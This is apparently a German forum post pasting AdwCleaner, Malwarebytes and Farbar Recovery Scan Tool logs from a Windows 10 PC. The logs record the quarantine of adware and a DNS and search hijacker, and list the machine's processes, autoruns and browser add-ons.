[-] Daten wiederhergestellt: HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{142b5a4e-79e0-4f08-bda2-eaa2ab4e2034} [NameServer]
[-] Daten wiederhergestellt: HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{ad8bd387-ecee-4a14-a4a7-473f0543f3ef} [NameServer]
[-] Daten wiederhergestellt: HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{be8f98fe-7eb3-471d-87c5-3d35bdb361e0} [NameServer]
[-] Daten wiederhergestellt: [x64] HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{06211c3c-22f5-4f8b-938a-39928700d64a} [NameServer]
[-] Daten wiederhergestellt: [x64] HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{142b5a4e-79e0-4f08-bda2-eaa2ab4e2034} [NameServer]
[-] Daten wiederhergestellt: [x64] HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{ad8bd387-ecee-4a14-a4a7-473f0543f3ef} [NameServer]
[-] Daten wiederhergestellt: [x64] HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{be8f98fe-7eb3-471d-87c5-3d35bdb361e0} [NameServer]
[-] Schlüssel gelöscht: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\cmptch.com
[-] Schlüssel gelöscht: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\static.cmptch.com
[-] Schlüssel gelöscht: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\cmptch.com
[-] Schlüssel gelöscht: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\static.cmptch.com
[#] Schlüssel mit Neustart gelöscht: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\cmptch.com
[#] Schlüssel mit Neustart gelöscht: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\static.cmptch.com
[#] Schlüssel mit Neustart gelöscht: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\cmptch.com
[#] Schlüssel mit Neustart gelöscht: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\static.cmptch.com
[-] Schlüssel gelöscht: HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\26D9E607FFF0C58C7844B47FF8B6E079E5A2220E
***** [ Browser ] *****
[-] [C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData] [startup_urls] Gelöscht: hxxp://www.youndoo.com/?z=29cb5008ab1dbbc7820f6fbg3z6b7q2c9gde0o1b9q&from=wak&uid=SamsungXSSDX850XPROX256GB_S251NSAG301960E&type=hp
[-] [C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData] [homepage] Gelöscht: hxxp://www.youndoo.com/?z=29cb5008ab1dbbc7820f6fbg3z6b7q2c9gde0o1b9q&from=wak&uid=SamsungXSSDX850XPROX256GB_S251NSAG301960E&type=hp
*************************
:: "Tracing" Schlüssel gelöscht
:: Winsock Einstellungen zurückgesetzt
:: "Image File Execution Options" Schlüssel gelöscht
:: "Prefetch" Dateien gelöscht
:: Proxy Einstellungen zurückgesetzt
:: Firewall Einstellungen zurückgesetzt
:: Internet Explorer Richtlinien gelöscht
:: Chrome Richtlinien gelöscht
*************************
C:\AdwCleaner\AdwCleaner[C0].txt - [6588 Bytes] - [22/05/2017 18:19:38]
C:\AdwCleaner\AdwCleaner[S0].txt - [6473 Bytes] - [22/05/2017 18:18:35]
########## EOF - C:\AdwCleaner\AdwCleaner[C0].txt - [6734 Bytes] ##########
Code:
ATTFilter Malwarebytes
www.malwarebytes.com
-Protokolldetails-
Scan-Datum: 22.05.17
Scan-Zeit: 18:25
Protokolldatei: Mbam.txt
Administrator: Ja
-Softwaredaten-
Version: 3.1.2.1733
Komponentenversion: 1.0.122
Version des Aktualisierungspakets: 1.0.1995
Lizenz: Testversion
-Systemdaten-
Betriebssystem: Windows 10
CPU: x64
Dateisystem: NTFS
Benutzer: ****\Dino
-Scan-Übersicht-
Scan-Typ: Bedrohungs-Scan
Ergebnis: Abgeschlossen
Gescannte Objekte: 377606
Erkannte Bedrohungen: 30
In die Quarantäne verschobene Bedrohungen: 30
Abgelaufene Zeit: 1 Min., 8 Sek.
-Scan-Optionen-
Speicher: Aktiviert
Start: Aktiviert
Dateisystem: Aktiviert
Archive: Aktiviert
Rootkits: Deaktiviert
Heuristik: Aktiviert
PUP: Aktiviert
PUM: Aktiviert
-Scan-Details-
Prozess: 0
(keine bösartigen Elemente erkannt)
Modul: 0
(keine bösartigen Elemente erkannt)
Registrierungsschlüssel: 1
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\{646f2bbc}, In Quarantäne, [28], [260250],1.0.1995
Registrierungswert: 1
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\{646f2bbc}|1, In Quarantäne, [28], [260250],1.0.1995
Registrierungsdaten: 14
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS|NameServer, Ersetzt, [28], [-1],0.0.0
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS|DhcpNameServer, Ersetzt, [28], [-1],0.0.0
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS\Interfaces\{06211c3c-22f5-4f8b-938a-39928700d64a}|NameServer, Ersetzt, [28], [-1],0.0.0
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS\Interfaces\{06211c3c-22f5-4f8b-938a-39928700d64a}|DhcpNameServer, Ersetzt, [28], [-1],0.0.0
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS\Interfaces\{142b5a4e-79e0-4f08-bda2-eaa2ab4e2034}|NameServer, Ersetzt, [28], [-1],0.0.0
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS\Interfaces\{142b5a4e-79e0-4f08-bda2-eaa2ab4e2034}|DhcpNameServer, Ersetzt, [28], [-1],0.0.0
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS\Interfaces\{46b778ab-edfa-42f3-91a9-8cdd864f74fe}|NameServer, Ersetzt, [28], [-1],0.0.0
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS\Interfaces\{7340d9b1-829b-408c-bec7-3deae2933b18}|NameServer, Ersetzt, [28], [-1],0.0.0
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS\Interfaces\{8718928d-cbeb-45ea-a621-800a9249001d}|NameServer, Ersetzt, [28], [-1],0.0.0
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS\Interfaces\{ad8bd387-ecee-4a14-a4a7-473f0543f3ef}|NameServer, Ersetzt, [28], [-1],0.0.0
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS\Interfaces\{ad8bd387-ecee-4a14-a4a7-473f0543f3ef}|DhcpNameServer, Ersetzt, [28], [-1],0.0.0
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS\Interfaces\{b99ccfae-f682-4e7e-b110-ad59dc2334c2}|NameServer, Ersetzt, [28], [-1],0.0.0
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS\Interfaces\{be8f98fe-7eb3-471d-87c5-3d35bdb361e0}|NameServer, Ersetzt, [28], [-1],0.0.0
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS\Interfaces\{be8f98fe-7eb3-471d-87c5-3d35bdb361e0}|DhcpNameServer, Ersetzt, [28], [-1],0.0.0
Daten-Stream: 0
(keine bösartigen Elemente erkannt)
Ordner: 5
Adware.Elex.SHHKRST, C:\USERS\DINO\APPDATA\ROAMING\Thertsparimoly, In Quarantäne, [11], [373192],1.0.1995
PUP.Optional.SwytShop, C:\USERS\DINO\APPDATA\LOCAL\Programs\SS_FF, In Quarantäne, [3121], [375392],1.0.1995
PUP.Optional.SwytShop, C:\USERS\DINO\APPDATA\LOCAL\Programs\SwytShop_Pkg1, In Quarantäne, [3121], [386986],1.0.1995
Adware.OtherSearch.TSKRST, C:\Program Files (x86)\X7YP5EPJng\SSL, In Quarantäne, [2795], [371199],1.0.1995
Adware.OtherSearch.TSKRST, C:\PROGRAM FILES (X86)\X7YP5EPJng, In Quarantäne, [2795], [371199],1.0.1995
Datei: 9
PUP.Optional.SwytShop, C:\Users\Dino\AppData\Local\Programs\SS_FF\SS_FF.xpi, In Quarantäne, [3121], [375392],1.0.1995
PUP.Optional.SwytShop, C:\Users\Dino\AppData\Local\Programs\SwytShop_Pkg1\unins000.dat, In Quarantäne, [3121], [386986],1.0.1995
PUP.Optional.Youndoo, C:\USERS\DINO\APPDATA\ROAMING\PROFILES\PRISERPYGRESENT.DEFAULT\SEARCHPLUGINS\ME1J2IQC.XML, In Quarantäne, [599], [324489],1.0.1995
Adware.OtherSearch.TSKRST, C:\PROGRAM FILES (X86)\X7YP5EPJng\SSL\OtherSearch Inc CA 2.cer, In Quarantäne, [2795], [371199],1.0.1995
Adware.OtherSearch.TSKRST, C:\Program Files (x86)\X7YP5EPJng\SSL\cert.db, In Quarantäne, [2795], [371199],1.0.1995
Adware.OtherSearch.TSKRST, C:\Program Files (x86)\X7YP5EPJng\SSL\xtls.db, In Quarantäne, [2795], [371199],1.0.1995
Adware.OtherSearch.TSKRST, C:\Program Files (x86)\X7YP5EPJng\SSL\xv.db, In Quarantäne, [2795], [371199],1.0.1995
Adware.OtherSearch.TSKRST, C:\Program Files (x86)\X7YP5EPJng\dlog.txt, In Quarantäne, [2795], [371199],1.0.1995
Adware.OtherSearch.TSKRST, C:\Program Files (x86)\X7YP5EPJng\s.xml, In Quarantäne, [2795], [371199],1.0.1995
Physischer Sektor: 0
(keine bösartigen Elemente erkannt)
(end)
Code:
ATTFilter Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 20-05-2017
durchgeführt von Dino (Administrator) auf *** (22-05-2017 18:36:22)
Gestartet von C:\Users\Dino\Desktop
Geladene Profile: Dino & (Verfügbare Profile: Dino)
Platform: Windows 10 Pro Version 1703 (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 11 (Standard-Browser: FF)
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/
==================== Prozesse (Nicht auf der Ausnahmeliste) =================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)
(Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\vsserv.exe
(AMD) C:\Windows\System32\atiesrxx.exe
(AMD) C:\Windows\System32\atieclxx.exe
() C:\Program Files (x86)\ASUS\AXSP\1.01.02\atkexComSvc.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AAHM\1.00.22\aaHMSvc.exe
() C:\Windows\SysWOW64\ASGT.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AsusFanControlService\1.06.13\AsusFanControlService.exe
(Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Bitdefender) C:\Program Files\Bitdefender Agent\ProductAgentService.exe
(Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\updatesrv.exe
(Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\vsservp.exe
(DEVGURU Co., LTD.) C:\Program Files (x86)\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AI Suite III\AISuite3.exe
() C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe
(ASUS) C:\Program Files (x86)\ASUS\GPU Tweak\Monitor.exe
(Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Advanced Micro Devices, Inc.) C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe
() C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.15.597.0_x64__kzf8qxf38zg5c\SkypeHost.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MSASCuiL.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Microsoft Corporation) C:\Program Files\Microsoft Xbox 360 Accessories\XBoxStat.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
(Spotify Ltd) C:\Users\Dino\AppData\Roaming\Spotify\SpotifyWebHelper.exe
(Samsung) C:\Program Files (x86)\Samsung\Smart Switch PC\SmartSwitchPDLR.exe
() C:\Program Files (x86)\ASUS\AI Suite III\AsusMiniBar.exe
(CANON INC.) C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX\CNMNSST.exe
(Samsung Electronics.) C:\Program Files (x86)\Samsung\Samsung Magician\Samsung Magician.exe
(Geek Software GmbH) C:\Program Files (x86)\PDF24\pdf24.exe
() C:\Program Files (x86)\Drakonia Configurator\hid.exe
() C:\Program Files (x86)\Drakonia Configurator\trayicon.exe
(Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\bdagent.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Microsoft Corporation) C:\Windows\System32\wbem\WMIADAP.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Microsoft Corporation) C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.15063.0_none_1a733a82001933cc\TiWorker.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
==================== Registry (Nicht auf der Ausnahmeliste) ====================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)
HKLM\...\Run: [SecurityHealth] => C:\Program Files\Windows Defender\MSASCuiL.exe [629152 2017-03-18] (Microsoft Corporation)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [8466136 2015-04-30] (Realtek Semiconductor)
HKLM\...\Run: [XboxStat] => C:\Program Files\Microsoft Xbox 360 Accessories\XboxStat.exe [825184 2009-09-30] (Microsoft Corporation)
HKLM\...\Run: [Malwarebytes TrayApp] => C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\mbamtray.exe [3146704 2017-05-09] (Malwarebytes)
HKLM-x32\...\Run: [IJNetworkScannerSelectorEX] => C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX\CNMNSST.exe [438888 2014-01-15] (CANON INC.)
HKLM-x32\...\Run: [PDFPrint] => C:\Program Files (x86)\PDF24\pdf24.exe [210432 2016-07-05] (Geek Software GmbH)
HKLM-x32\...\Run: [GamingMouse] => C:\Program Files (x86)\Drakonia Configurator\hid.exe [248832 2013-10-29] ()
HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\Run: [Spotify Web Helper] => C:\Users\Dino\AppData\Roaming\Spotify\SpotifyWebHelper.exe [1446000 2017-02-19] (Spotify Ltd)
HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\Run: [SmartSwitchPDLR.exe] => C:\Program Files (x86)\Samsung\Smart Switch PC\SmartSwitchPDLR.exe [1037992 2017-02-07] (Samsung)
HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\MountPoints2: {ab244902-eb0d-11e4-8257-806e6f6e6963} - "E:\autorun.exe"
HKU\S-1-5-21-3554052566-3312977812-1675691648-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-05222017182914436\...\Run: [Spotify Web Helper] => C:\Users\Dino\AppData\Roaming\Spotify\SpotifyWebHelper.exe [1446000 2017-02-19] (Spotify Ltd)
HKU\S-1-5-21-3554052566-3312977812-1675691648-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-05222017182914436\...\Run: [SmartSwitchPDLR.exe] => C:\Program Files (x86)\Samsung\Smart Switch PC\SmartSwitchPDLR.exe [1037992 2017-02-07] (Samsung)
HKU\S-1-5-21-3554052566-3312977812-1675691648-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-05222017182914436\...\MountPoints2: {ab244902-eb0d-11e4-8257-806e6f6e6963} - "E:\autorun.exe"
==================== Internet (Nicht auf der Ausnahmeliste) ====================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1
Tcpip\Parameters: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{06211c3c-22f5-4f8b-938a-39928700d64a}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{06211c3c-22f5-4f8b-938a-39928700d64a}: [DhcpNameServer] 8.8.8.8
Tcpip\..\Interfaces\{0784e829-3340-11e7-867e-806e6f6e6963}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{142b5a4e-79e0-4f08-bda2-eaa2ab4e2034}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{142b5a4e-79e0-4f08-bda2-eaa2ab4e2034}: [DhcpNameServer] 8.8.8.8
Tcpip\..\Interfaces\{46b778ab-edfa-42f3-91a9-8cdd864f74fe}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{7340d9b1-829b-408c-bec7-3deae2933b18}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{8718928d-cbeb-45ea-a621-800a9249001d}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{ad8bd387-ecee-4a14-a4a7-473f0543f3ef}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{ad8bd387-ecee-4a14-a4a7-473f0543f3ef}: [DhcpNameServer] 8.8.8.8
Tcpip\..\Interfaces\{b99ccfae-f682-4e7e-b110-ad59dc2334c2}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{be8f98fe-7eb3-471d-87c5-3d35bdb361e0}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{be8f98fe-7eb3-471d-87c5-3d35bdb361e0}: [DhcpNameServer] 192.168.0.1
Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://google.de/
HKU\S-1-5-21-3554052566-3312977812-1675691648-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-05222017182914436\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://google.de/
BHO: Bitdefender-Geldbörse -> {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} -> C:\Program Files\Bitdefender\Bitdefender 2017\pmbxie.dll [2017-04-24] (Bitdefender)
BHO: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files\Canon\Easy-WebPrint EX\ewpexbho.dll [2014-07-07] (CANON INC.)
BHO: Ghostery Plugin -> {6BF739DD-3323-4C6A-975B-C7E00A50B154} -> C:\Program Files (x86)\Ghostery\bin\ghostery64.dll [2015-01-23] (Ghostery, Inc.)
BHO: Adblock Plus for IE Browser Helper Object -> {FFCB3198-32F3-4E8B-9539-4324694ED664} -> C:\Program Files\Adblock Plus for IE\AdblockPlus64.dll [2015-02-25] (Eyeo GmbH)
BHO-x32: Bitdefender-Geldbörse -> {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} -> C:\Program Files\Bitdefender\Bitdefender 2017\Antispam32\pmbxie.dll [2017-04-24] (Bitdefender)
BHO-x32: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexbho.dll [2014-07-07] (CANON INC.)
BHO-x32: Ghostery Plugin -> {6BF739DD-3323-4C6A-975B-C7E00A50B154} -> C:\Program Files (x86)\Ghostery\bin\ghostery.dll [2015-01-23] (Ghostery, Inc.)
BHO-x32: Adblock Plus for IE Browser Helper Object -> {FFCB3198-32F3-4E8B-9539-4324694ED664} -> C:\Program Files\Adblock Plus for IE\AdblockPlus32.dll [2015-02-25] (Eyeo GmbH)
Toolbar: HKLM - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files\Canon\Easy-WebPrint EX\ewpexhlp.dll [2014-07-07] (CANON INC.)
Toolbar: HKLM - Bitdefender-Geldbörse - {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} - C:\Program Files\Bitdefender\Bitdefender 2017\pmbxie.dll [2017-04-24] (Bitdefender)
Toolbar: HKLM-x32 - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexhlp.dll [2014-07-07] (CANON INC.)
Toolbar: HKLM-x32 - Bitdefender-Geldbörse - {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} - C:\Program Files\Bitdefender\Bitdefender 2017\Antispam32\pmbxie.dll [2017-04-24] (Bitdefender)
FireFox:
========
FF ProfilePath: C:\Users\Dino\AppData\Roaming\Mozilla\Firefox\Profiles\rcgkbgt3.default-1489247668614 [2017-05-22]
FF Homepage: Mozilla\Firefox\Profiles\rcgkbgt3.default-1489247668614 -> google.de/
FF HKLM\...\Firefox\Extensions: [bdwteffv20@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2017\antispam32\bdwteff
FF Extension: (Bitdefender Wallet) - C:\Program Files\Bitdefender\Bitdefender 2017\antispam32\bdwteff [2017-05-01]
FF HKLM\...\Thunderbird\Extensions: [bdThunderbird@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2017\bdtbext
FF Extension: (Bitdefender Antispam Toolbar) - C:\Program Files\Bitdefender\Bitdefender 2017\bdtbext [2017-01-19] [ist nicht signiert]
FF HKLM-x32\...\Firefox\Extensions: [bdwteffv20@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2017\antispam32\bdwteff
FF HKLM-x32\...\Thunderbird\Extensions: [bdThunderbird@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2017\bdtbext
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_25_0_0_171.dll [2017-05-12] ()
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_25_0_0_171.dll [2017-05-12] ()
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-09-16] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-09-16] (Intel Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-05-01] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-05-01] (Google Inc.)
Chrome:
=======
CHR DefaultProfile: ChromeDefaultData
CHR HomePage: ChromeDefaultData -> hxxps://www.google.com/
CHR DefaultSearchURL: ChromeDefaultData -> hxxp://www.youndoo.com/search/?q={searchTerms}&z=29cb5008ab1dbbc7820f6fbg3z6b7q2c9gde0o1b9q&from=wak&uid=SamsungXSSDX850XPROX256GB_S251NSAG301960E&type=sp
CHR DefaultSearchKeyword: ChromeDefaultData -> youndoo
CHR Profile: C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData [2017-02-05] <==== ACHTUNG
CHR Extension: (Google Präsentationen) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-11-22]
CHR Extension: (Google Docs) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\aohghmighlieiainnegkcijnfilokake [2015-11-22]
CHR Extension: (Google Drive) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-11-22]
CHR Extension: (YouTube) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-11-22]
CHR Extension: (Google-Suche) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-11-22]
CHR Extension: (Google Tabellen) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-11-22]
CHR Extension: (Google Docs Offline) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-11-22]
CHR Extension: (CrowdBar) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\lhinknkceoifkecnmmlgnelmdipmbcdn [2015-11-22]
CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-11-22]
CHR Extension: (Google Mail) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-11-22]
CHR HKLM-x32\...\Chrome\Extension: [gannpgaobkkhmpomoijebaigcapoeebl] - hxxps://clients2.google.com/service/update2/crx
==================== Dienste (Nicht auf der Ausnahmeliste) ====================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
R2 asComSvc; C:\Program Files (x86)\ASUS\AXSP\1.01.02\atkexComSvc.exe [936728 2013-07-04] ()
R2 ASGT; C:\Windows\SysWOW64\ASGT.exe [55296 2012-01-17] () [Datei ist nicht signiert]
R2 asHmComSvc; C:\Program Files (x86)\ASUS\AAHM\1.00.22\aaHMSvc.exe [954648 2014-09-09] (ASUSTeK Computer Inc.)
R2 AsusFanControlService; C:\Program Files (x86)\ASUS\AsusFanControlService\1.06.13\AsusFanControlService.exe [384000 2014-10-11] (ASUSTeK Computer Inc.) [Datei ist nicht signiert]
S3 EasyAntiCheat; C:\WINDOWS\SysWOW64\EasyAntiCheat.exe [409128 2017-02-23] (EasyAntiCheat Ltd)
S3 ElfoService; D:\Programme\ElsterFormular Update Service\bin\ElfoService.exe [1283304 2017-03-20] ()
R2 Intel(R) Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [747520 2013-08-27] (Intel(R) Corporation) [Datei ist nicht signiert]
